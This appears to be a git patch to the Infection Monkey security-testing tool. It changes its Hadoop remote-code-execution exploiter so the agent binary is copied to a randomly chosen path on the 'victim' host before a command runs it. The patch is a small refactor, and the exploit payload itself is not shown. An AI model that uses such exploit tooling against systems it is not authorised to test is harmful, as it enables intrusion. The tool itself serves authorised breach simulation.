From db03ac3dd9a823e23494d0fa24292d2f876ca045 Mon Sep 17 00:00:00 2001 From: Ilija Lazoroski Date: Thu, 24 Mar 2022 09:36:20 +0100 Subject: [PATCH] Agent: Use random binary destination path for Hadoop --- monkey/infection_monkey/exploit/hadoop.py | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index 60ba4285d..689120f59 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -12,6 +12,7 @@ import string import requests from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT +from infection_monkey.exploit.tools.helpers import get_agent_dest_path from infection_monkey.exploit.tools.http_tools import HTTPTools from infection_monkey.exploit.web_rce import WebRCE from infection_monkey.model import ( @@ -43,16 +44,16 @@ class HadoopExploiter(WebRCE): return self.exploit_result try: - dropper_target_path = self.monkey_target_paths[self.host.os["type"]] + monkey_path_on_victim = get_agent_dest_path(self.host, self.options) except KeyError: return self.exploit_result http_path, http_thread = HTTPTools.create_locked_transfer( - self.host, dropper_target_path, self.agent_repository + self.host, str(monkey_path_on_victim), self.agent_repository ) try: - command = self._build_command(dropper_target_path, http_path) + command = self._build_command(monkey_path_on_victim, http_path) if self.exploit(self.vulnerable_urls[0], command): self.add_executed_cmd(command)